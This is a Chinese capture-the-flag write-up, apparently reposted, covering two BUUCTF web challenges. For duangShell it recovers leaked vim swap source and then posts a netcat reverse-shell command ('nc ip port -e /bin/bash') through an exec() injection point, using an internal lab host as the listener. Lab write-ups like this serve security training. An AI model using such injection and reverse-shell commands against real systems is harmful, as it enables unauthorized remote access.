[BUUCTF]第一天训练

   日期:2020-10-01     浏览:158    评论:0    
核心提示:文章目录[BSidesCF 2019]Futurella[BJDCTF 2nd]duangShell反弹姿势1(未成功)反弹姿势2[BSidesCF 2019]Futurella好久没看过这么简单的题目了,哇哇哇整了个火星文,看不懂查看源代码[BJDCTF 2nd]duangShell点进去发现是swp源码泄露利用vim -r index.php.swp恢复文件这里我知道了exec函数与system类似但是没有回显,所以我传入的参数girl_friend=print_r(scandir(

文章目录

  • [BSidesCF 2019]Futurella
  • [BJDCTF 2nd]duangShell
    • 反弹姿势1(未成功)
    • 反弹姿势2

[BSidesCF 2019]Futurella

好久没看过这么简单的题目了,哇哇哇
整了个火星文,看不懂查看源代码

[BJDCTF 2nd]duangShell

点进去发现是swp源码泄露

利用vim -r index.php.swp恢复文件

这里我知道了exec函数与system类似但是没有回显,所以我传入的参数girl_friend=print_r(scandir(dirname(__FILE__)))会没有显示
看了别人的wp,发现我们只能用反弹shell的方法了,根据提示

由于这题的环境靶机无法访问外网,所以需要一个内网靶机来做,这里就直接用了题目中推荐的Basic中的Linux Labs,由于这台靶机已经安装了lamp,已指出http服务,利用xshell连接主机

反弹姿势1(未成功)



开启

反弹shell

不知道为啥通不了迷惑???

反弹姿势2

post参数:nc ip port -e /bin/bash


这个靶机真垃圾

 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服